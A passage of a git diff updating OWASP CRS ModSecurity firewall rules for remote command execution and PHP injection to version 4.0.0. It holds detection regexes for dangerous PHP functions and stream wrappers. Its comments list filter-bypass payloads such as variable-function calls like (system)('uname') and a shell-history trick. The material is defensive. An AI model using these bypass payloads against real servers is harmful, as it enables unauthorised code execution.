(?:\(\x5c[a-z]{1,20}\))?|ARTTLS)|UBSCRIBE [\"-#%-&\*\--9A-Z\x5c_a-z]+)|UN(?:SUBSCRIBE [\"-#%-&\*\--9A-Z\x5c_a-z]+|AUTHENTICATE)|NOOP)" \ + "id:932311,\ + phase:2,\ + block,\ + t:none,t:escapeSeqDecode,\ + msg:'Remote Command Execution: IMAP Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/137/134',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + +# =[ POP3 Command Execution ]= +# +# This rule prevents execution of POP3 related system commands. +# +# These commands may have a higher risk of false positives. +# For explanation of this rule, see above rule 932320. +# +# Rule 932321 is a stricter sibling of rule 932320. +# +# Regular expression generated from regex-assembly/932321.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932321 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \r\n(?s:.)*?\b(?:(?:QUI|STA|RSE)(?i:T)|NOOP|CAPA)" \ + "id:932321,\ + phase:2,\ + block,\ + t:none,t:escapeSeqDecode,\ + msg:'Remote Command Execution: POP3 Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/137/134',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# =[ Unix shell history invocation ]= +# +# This rule is a stricter sibling of 932330. +# Shell history can also be invoked by providing an absolute position: '!1' or by repeating the last command '!!'. +# The latter might seem harmless as you would expect that it already requires a successful exploitation, but it is a threat in disguise. +# +# Imagine the following requests: +# GET /?rce=c +# GET /?rce=!!!! +# The last request will invoke /usr/bin/cc, which is otherwise blocked by 932150. +# +# Neither !1 nor !! is necessarily valid speech, but blocking either of them is much more likely to cause false-positives than 932330. +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx !(?:\d|!)" \ + "id:932331,\ + phase:2,\ + block,\ + t:none,\ + msg:'Remote Command Execution: Unix shell history invocation',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:932017,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:932018,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932017,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932018,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf b/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf index d6edd63c57..66bd9eabb1 100644 --- a/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf +++ b/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ @@ -13,18 +14,18 @@ -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:933011,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:933012,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933011,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933012,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # # # -=[ PHP Injection Attacks ]=- # # [ References ] -# http://rips-scanner.sourceforge.net/ -# https://www.owasp.org/index.php/PHP_Top_5#P1:_Remote_Code_Executionh +# https://rips-scanner.sourceforge.net/ +# https://wiki.owasp.org/index.php/PHP_Top_5#P1:_Remote_Code_Executionh # # @@ -43,12 +44,12 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:933012,phase:2,pass,nolog,skipAf # Therefore, that pattern is now checked by rule 933190 in paranoia levels # 3 or higher. # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:<\?(?:[^x]|x[^m]|xm[^l]|xml[^\s]|xml$|$)|<\?php|\[(?:\/|\\\\)?php\])" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:<\?(?:[^x]|x[^m]|xm[^l]|xml[^\s]|xml$|$)|<\?php|\[(?:/|\x5c)?php\])" \ "id:933100,\ phase:2,\ block,\ capture,\ - t:none,t:urlDecodeUni,t:lowercase,\ + t:none,t:lowercase,\ msg:'PHP Injection Attack: PHP Open Tag Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ @@ -58,11 +59,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # [ PHP Script Uploads ] @@ -71,7 +71,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # (.php, .phps, .phtml, .php5 etc). # # Many application contain Unrestricted File Upload vulnerabilities. -# https://www.owasp.org/index.php/Unrestricted_File_Upload +# https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload # # Attackers may use such a vulnerability to achieve remote code execution # by uploading a .php file. If the upload storage location is predictable @@ -79,13 +79,13 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # .php file and have the code within it executed on the server. # # Also block files with just dot (.) characters after the extension: -# https://community.rapid7.com/community/metasploit/blog/2013/08/15/time-to-patch-joomla +# https://www.rapid7.com/blog/post/2013/08/15/time-to-patch-joomla/ # # Some AJAX uploaders use the nonstandard request headers X-Filename, # X_Filename, or X-File-Name to transmit the file name to the server; # scan these request headers as well as multipart/form-data file names. # -SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X.Filename|REQUEST_HEADERS:X-File-Name "@rx .*\.(?:php\d*|phtml)\.*$" \ +SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X.Filename|REQUEST_HEADERS:X-File-Name "@rx .*\.ph(?:p\d*|tml|ar|ps|t|pt)\.*$" \ "id:933110,\ phase:2,\ block,\ @@ -100,11 +100,10 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # @@ -115,9 +114,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME phase:2,\ block,\ capture,\ - t:none,t:urlDecodeUni,t:normalisePath,t:lowercase,\ + t:none,t:normalisePath,\ msg:'PHP Injection Attack: Configuration Directive Found',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.933120_TX_0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ @@ -125,14 +124,14 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ + setvar:'tx.933120_tx_0=%{tx.0}',\ chain" SecRule MATCHED_VARS "@pm =" \ "capture,\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # @@ -143,7 +142,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME phase:2,\ block,\ capture,\ - t:none,t:normalisePath,t:urlDecodeUni,t:lowercase,\ + t:none,t:normalisePath,t:urlDecodeUni,\ msg:'PHP Injection Attack: Variables Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ @@ -153,11 +152,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # @@ -190,11 +188,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # @@ -205,7 +202,15 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # could lead to RCE as describled by Sam Thomas at BlackHat USA 2018 (https://bit.ly/2yaKV5X), even # wrappers like zlib://, glob://, rar://, zip://, etc... could lead to LFI and expect:// to RCE. # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:zlib|glob|phar|ssh2|rar|ogg|expect|zip)://" \ +# Valid PHP wrappers can be found in the PHP documentation here: +# https://www.php.net/manual/en/wrappers.php +# +# Regular expression generated from regex-assembly/933200.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 933200 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:bzip2|expect|glob|ogg|(?:ph|r)ar|ssh2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?|z(?:ip|lib))://" \ "id:933200,\ phase:2,\ block,\ @@ -219,11 +224,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # @@ -246,7 +250,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # false positives in natural language or other contexts. # Examples: 'chr', 'eval'. # To mitigate false positives, a regexp looks for PHP function syntax, e.g. 'eval()'. -# Regexp is generated from function names in util/regexp-assemble/regexp-933160.data +# Regexp is generated from function names in /regexp-assemble/data/933160.ra # # - Rule 933151: ~1300 words of lesser importance. This includes most PHP functions and keywords. # Examples: 'addslashes', 'array_diff'. @@ -260,7 +264,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # Examples: 'abs', 'cos'. # To mitigate false positives, a regexp matches on function syntax, e.g. 'abs()'. # This rule only runs in paranoia level 3 or higher. -# Regexp is generated from function names in util/regexp-assemble/regexp-933161.data +# Regexp is generated from function names in /regexp-assemble/data/933161.ra # @@ -277,7 +281,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F phase:2,\ block,\ capture,\ - t:none,t:lowercase,\ + t:none,\ msg:'PHP Injection Attack: High-Risk PHP Function Name Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ @@ -287,11 +291,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # @@ -315,18 +318,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F # system //comment \n (...) # system #comment \n (...) # -# This rule is also triggered by the following exploit(s): +# This rule is triggered by the following exploits as well, as they include the string 'exec(...)': # [ Apache Struts vulnerability CVE-2017-9791 - Exploit tested: https://www.exploit-db.com/exploits/42324 ] # [ Apache Struts vulnerability CVE-2018-11776 - Exploit tested: https://www.exploit-db.com/exploits/45260 ] # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # -# Regexp generated from util/regexp-assemble/regexp-933160.data using Regexp::Assemble. -# See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage. -# -# Note that after assemble, PHP function syntax pre/postfix is added to the Regexp::Assemble -# output. Example: "@rx (?i)\bASSEMBLE_OUTPUT_HERE(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" +# Regular expression generated from regex-assembly/933160.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 933160 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create|socket_client)|ipc?slashes|rev)|implexml_load_(?:string|file)|ocket_c(?:onnect|reate)|h(?:ow_sourc|a1_fil)e|pl_autoload_register|ystem)|p(?:r(?:eg_(?:replace(?:_callback(?:_array)?)?|match(?:_all)?|split)|oc_(?:(?:terminat|clos|nic)e|get_status|open)|int_r)|o(?:six_(?:get(?:(?:e[gu]|g)id|login|pwnam)|mk(?:fifo|nod)|ttyname|kill)|pen)|hp(?:_(?:strip_whitespac|unam)e|version|info)|g_(?:(?:execut|prepar)e|connect|query)|a(?:rse_(?:ini_file|str)|ssthru)|utenv)|r(?:unkit_(?:function_(?:re(?:defin|nam)e|copy|add)|method_(?:re(?:defin|nam)e|copy|add)|constant_(?:redefine|add))|e(?:(?:gister_(?:shutdown|tick)|name)_function|ad(?:(?:gz)?file|_exif_data|dir))|awurl(?:de|en)code)|i(?:mage(?:createfrom(?:(?:jpe|pn)g|x[bp]m|wbmp|gif)|(?:jpe|pn)g|g(?:d2?|if)|2?wbmp|xbm)|s_(?:(?:(?:execut|write?|read)ab|fi)le|dir)|ni_(?:get(?:_all)?|set)|terator_apply|ptcembed)|g(?:et(?:_(?:c(?:urrent_use|fg_va)r|meta_tags)|my(?:[gpu]id|inode)|(?:lastmo|cw)d|imagesize|env)|z(?:(?:(?:defla|wri)t|encod|fil)e|compress|open|read)|lob)|a(?:rray_(?:u(?:intersect(?:_u?assoc)?|diff(?:_u?assoc)?)|intersect_u(?:assoc|key)|diff_u(?:assoc|key)|filter|reduce|map)|ssert(?:_options)?)|h(?:tml(?:specialchars(?:_decode)?|_entity_decode|entities)|(?:ash(?:_(?:update|hmac))?|ighlight)_file|e(?:ader_register_callback|x2bin))|f(?:i(?:le(?:(?:[acm]tim|inod)e|(?:_exist|perm)s|group)?|nfo_open)|tp_(?:nb_(?:ge|pu)|connec|ge|pu)t|(?:unction_exis|pu)ts|write|open)|o(?:b_(?:get_(?:c(?:ontents|lean)|flush)|end_(?:clean|flush)|clean|flush|start)|dbc_(?:result(?:_all)?|exec(?:ute)?|connect)|pendir)|m(?:b_(?:ereg(?:_(?:replace(?:_callback)?|match)|i(?:_replace)?)?|parse_str)|(?:ove_uploaded|d5)_file|ethod_exists|ysql_query|kdir)|e(?:x(?:if_(?:t(?:humbnail|agname)|imagetype|read_data)|ec)|scapeshell(?:arg|cmd)|rror_reporting|val)|c(?:url_(?:file_create|exec|init)|onvert_uuencode|reate_function|hr)|u(?:n(?:serialize|pack)|rl(?:de|en)code|[ak]?sort)|(?:json_(?:de|en)cod|debug_backtrac|tmpfil)e|b(?:(?:son_(?:de|en)|ase64_en)code|zopen)|var_dump)(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b\(?[\"']*(?:assert(?:_options)?|c(?:hr|reate_function)|e(?:val|x(?:ec|p))|file(?:group)?|glob|i(?:mage(?:gif|(?:jpe|pn)g|wbmp|xbm)|s_a)|md5|o(?:pendir|rd)|p(?:assthru|open|rev)|(?:read|tmp)file|un(?:pac|lin)k|s(?:tat|ubstr|ystem))(?:/(?:\*.*\*/|/.*)|#.*|[\s\v\"])*[\"']*\)?[\s\v]*\(.*\)" \ "id:933160,\ phase:2,\ block,\ @@ -341,11 +343,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # @@ -362,7 +363,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F # unserialize() call, resulting in an arbitrary PHP object(s) injection into the # application scope. # -# https://www.owasp.org/index.php/PHP_Object_Injection +# https://owasp.org/www-community/vulnerabilities/PHP_Object_Injection # # In serialized form, PHP objects have the following format: # @@ -370,7 +371,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F # O:3:"Foo":0:{} # # Also detected are PHP objects with a custom unserializer: -# http://www.phpinternalsbook.com/classes_objects/serialization.html +# https://www.phpinternalsbook.com/php5/classes_objects/serialization.html # These have the following format: # # C:11:"ArrayObject":37:{x:i:0;a:1:{s:1:"a";s:1:"b";};m:a:0:{}} @@ -397,11 +398,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -453,24 +453,24 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # [ PHP Functions: Variable Function Prevent Bypass ] # # Referring to https://www.secjuice.com/php-rce-bypass-filters-sanitization-waf/ +# Regex test on https://regex101.com/r/x1tfXG/1 # the rule 933180 could be bypassed by using the following payloads: # -# - (system)('uname') -# - (sy.(st).em)('uname') -# - (string)"system"('uname') -# - define('x', 'sys' . 'tem');(x)/* comment */('uname') -# - $y = 'sys'.'tem';($y)('uname') +# - (system)('uname'); +# - (sy.(st).em)('uname'); +# - (string)"system"('uname'); +# - define('x', 'sys' . 'tem');(x)/* comment */('uname'); +# - $y = 'sys'.'tem';($y)('uname'); # - define('z', [['sys' .'tem']]);(z)[0][0]('uname'); -# - (system)(ls) +# - (system)(ls); # - (/**/system)(ls/**/); # - (['system'])[0]('uname'); # - (++[++system++][++0++])++{/*dsasd*/0}++(++ls++); @@ -480,12 +480,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F # - [ACME] this is a test (just a test) # - Test (with two) rounded (brackets) # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?:(?:\(|\[)[a-zA-Z0-9_.$\"'\[\](){}/*\s]+(?:\)|\])[0-9_.$\"'\[\](){}/*\s]*\([a-zA-Z0-9_.$\"'\[\](){}/*\s].*\)|\([\s]*string[\s]*\)[\s]*(?:\"|'))" \ +# Regular expression generated from regex-assembly/933210.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 933210 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?:\((?:.+\)(?:[\"'][\-0-9A-Z_a-z]+[\"'])?\(.+|[^\)]*string[^\)]*\)[\s\v\"'\--\.0-9A-\[\]_a-\{\}]+\([^\)]*)|(?:\[[0-9]+\]|\{[0-9]+\}|\$[^\(-\),\.-/;\x5c]+|[\"'][\-0-9A-Z\x5c_a-z]+[\"'])\(.+)\);" \ "id:933210,\ phase:2,\ block,\ capture,\ - t:none,t:urlDecode,t:replaceComments,t:compressWhitespace,\ + t:none,t:urlDecode,t:replaceComments,t:removeWhitespace,\ msg:'PHP Injection Attack: Variable Function Call Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ @@ -495,16 +500,15 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:933013,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:933014,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:933013,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:933014,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" # -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # # @@ -529,9 +533,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F phase:2,\ block,\ capture,\ - t:none,t:lowercase,\ + t:none,\ msg:'PHP Injection Attack: Medium-Risk PHP Function Name Found',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.933151_TX_0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ @@ -539,22 +543,22 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ tag:'paranoia-level/2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ + setvar:'tx.933151_tx_0=%{tx.0}',\ chain" SecRule MATCHED_VARS "@pm (" \ "capture,\ 